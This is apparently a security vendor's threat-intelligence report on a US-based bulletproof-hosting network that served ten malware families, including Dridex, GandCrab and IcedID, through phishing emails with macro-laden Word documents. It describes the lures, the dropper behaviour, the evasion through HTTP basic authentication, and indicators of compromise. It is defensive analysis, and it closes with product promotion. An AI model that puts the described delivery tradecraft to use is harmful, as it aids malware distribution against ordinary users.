Mapping Out a Malware Distribution Network
- More than a dozen US-based web servers were used to host 10 malware families, distributed through mass phishing campaigns.
- Malware families include Dridex, GandCrab, Neutrino, IcedID and others.
- Evidence suggests the existence of distinct threat actors: one responsible for email and malware hosting, and others that operate the malware.
- Indications that the servers are part of Necurs botnet malware-hosting infrastructure.
A Bromium review of threat data from May 2018 to March 2019 has documented a collection of web servers located in the United States that are being used to distribute 10 major malware families in large-scale malicious spam campaigns.
The malware hosted on the infrastructure includes five families of banking Trojans, two families of ransomware, and three information stealers. Multiple malware families were staged on the same web servers and subsequently distributed through mass phishing campaigns. The reuse of the servers to host different malware indicates the involvement of a common entity in the activities of the different malware operators. The variety of malware families hosted, and the apparent separation of command and control (C2) from email and hosting infrastructure, suggests the existence of distinct threat actors: one responsible for email and hosting, and others in charge of operating the malware.
In each of the campaigns, email was the attack vector. The phishing emails delivered Microsoft Word documents and used social engineering to trick victims into running malicious VBA macros that would download the malware. Significantly, the web servers we identified belong to a single autonomous system, AS53667, registered under the netname PONYNET, which contains 52,992 IP addresses. The hosting provider that owns PONYNET is a company called FranTech Solutions, a so-called “bulletproof host”. BuyVM is another company owned by FranTech that sells virtual private server (VPS) hosting services. One of the data centres used by BuyVM is in Nevada, US, which is where 11 of the web servers were hosted.
Malware Hosted on US Soil
It was interesting to us that the hosting infrastructure is located in the United States and not in a jurisdiction that is known to be uncooperative with law enforcement. One possible reason for choosing a US hosting provider is so that the HTTP connections to download the malware from the web servers are more likely to succeed inside organisations that block traffic to and from countries that fall outside of their typical profile of network traffic.
There is evidence to suggest that the malware identified primarily targets an anglophone audience because all the phishing emails and documents we examined from campaigns linked to the hosting infrastructure were written in English. Moreover, several of the lures used were only relevant to a US audience. For example, in March 2019 GandCrab ransomware hosted one of the web servers was distributed through phishing emails that purported to be from the Centers for Disease Control and Prevention (CDC), a US government federal agency.
The servers identified run similar software builds, namely default installations of CentOS and Apache HTTP Server versions 2.4.6 or 2.2.15. The malicious executables were nearly always hosted in the root directory of the web servers. We found no evidence that the web servers ever hosted legitimate content, which suggests that they were provisioned to host malware.
Figure 1 – The default Apache installation web page had not been changed on the servers.
The naming convention of the malicious files often revealed the family of the malware or its intended purpose. For example, in a campaign in September 2018 we saw a Neutrino (also known as Kasidet) sample named ‘cc.exe’ being hosted. Neutrino is an information stealer known for exfiltrating credit card data from point of sale (POS) systems, perhaps explaining why it was given this filename.
|Filename Observed||Malware Family|
When we examined the samples hosted on the web servers, we noticed that the time difference between when they were compiled and when they were first observed being hosted was less than 24 hours, and in some cases only a matter of hours. The quick turnaround from compilation to hosting suggests an organised relationship between malware developers and the operators of the distribution infrastructure.
|SHA256||Compile Time||First Observed Hosted Time|
|125F787817B611F330AE77C773014C560A1051D26F958B01FABD7DFCEF10FC42||2019-03-13 06:01||2019-03-13 10:53|
We identified similarities across the malicious spam campaigns delivering the different malware families hosted on the web servers. Nearly all of the campaigns delivered phishing emails with Microsoft Word documents that contained malicious VBA macros. In several campaigns, the phishing emails contained a hyperlink to a domain pointed to one of the malware distribution servers. Analysis of the macros in the Word droppers found that they all contained a hard-coded IP address of the web server hosting the second-stage malware, rather than a domain name. Additionally, all the macros saved the resulting executable to a file named ‘qwerty2.exe’, which was then run in the user’s temporary directory. 63% of the campaigns delivered a weaponised Word document that was password protected, with a simple password in the message body of the email, such as ‘1234’ or ‘321’.
Figure 2 – Most frequently encountered weaponised document type.
We also noticed the reoccurrence of lures across the campaigns. The most popular lure was a job application narrative (42%) containing a resume to be reviewed, followed by emails posing as unpaid invoices (21%).
Shared Malware Hosting Infrastructure
We identified several cases where multiple malware families were hosted on the same server. In some cases, two malware families were used in conjunction with each other, where one would act as a dropper for the other. We saw this pairing behaviour in phishing campaigns in July and August 2018 that delivered AZORult, an information stealer that was used to download Hermes ransomware. In those campaigns, both types of malware were hosted on the same server.
Figure 3 – Dridex and IcedID shared distribution infrastructure.
The other pattern we saw is where the servers were reused to host malware for different campaigns. On 5 March 2019, we saw a malicious spam campaign that ultimately delivered IcedID, a banking Trojan. The following week on 13 March, we observed the same server being reused to host Dridex, a different family of banking Trojan. In another case, we saw a single web server being used to host six different malware families in campaigns over 40 days in 2018.
Links to Necurs Botnet and Signs of a Possible Dridex Resurgence
In March 2019, we noticed that one of the web servers was used to host a recent sample of Dridex. Seeing Dridex on this infrastructure was interesting to us for two reasons. The gang operating Dridex has been using the Necurs botnet as a vehicle for spreading their malware through malicious spam campaigns since 2016. Given the similarities between the campaigns delivering Dridex and the other malware families we identified, it is possible that this collection of web servers is part of the malware hosting and distribution infrastructure used by the operators of the Necurs botnet. All the hosted malware we examined has been linked to high-volume malicious spam campaigns that are consistent with the tactics, techniques and procedures (TTPs) and distribution-as-a-service business model of the Necurs botnet.
The second reason why this caught our attention is that, unlike the other campaigns, the web server enforced HTTP basic authentication as a means of preventing the executable from being downloaded without a correct username and password. It is likely that this was implemented to impede investigations by network defenders and researchers because analysis of the payload requires access to the Word dropper or sources of network traffic containing the HTTP request, such as proxy logs or full packet capture. The username and password pair in that campaign was ‘username’ and ‘password’, and the name of the delivered file was ‘test1.exe’, suggesting that this may have been a trial campaign. Given the relative lull of Dridex activity for several months, this may be an indication of preparation for larger Dridex campaigns to come, or the adoption of HTTP basic authentication in other campaigns.
Figure 4 – VBA code from Word dropper delivering Dridex using HTTP basic authentication in March 2019.
Malware Families Hosted
We identified 10 malware families being distributed through this hosting infrastructure, listed below.
|AZORult||Information stealer (used as a dropper)|
Email is the favoured attack vector for the malware families we identified in this research. This speaks to the enduring effectiveness of phishing campaigns at convincing users to open malicious documents and hyperlinks. Computers that are running Bromium Secure Platform are protected from these attacks because every Office document and website is opened in an isolated micro-virtual machine. Should a vulnerability be exploited, or malware downloaded by a macro, it has zero impact on the confidentiality, integrity and availability of the data held on the machine. All of the threat data associated with the attack is recorded and presented in the Bromium Controller, enabling SOC and incident response teams to gain detailed insights into the threats facing their organisations quickly.
Indicators of Compromise (IOCs)
|File Path||%TEMP%\qwerty2.exe||Malicious executable path|
|Web server used for malware distribution|
|Hosted malicious files|